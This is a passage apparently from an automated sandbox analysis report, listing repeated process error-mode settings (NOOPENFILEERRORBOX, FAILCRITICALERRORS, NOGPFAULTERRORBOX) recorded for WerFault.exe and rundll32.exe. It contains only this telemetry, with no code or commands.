    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
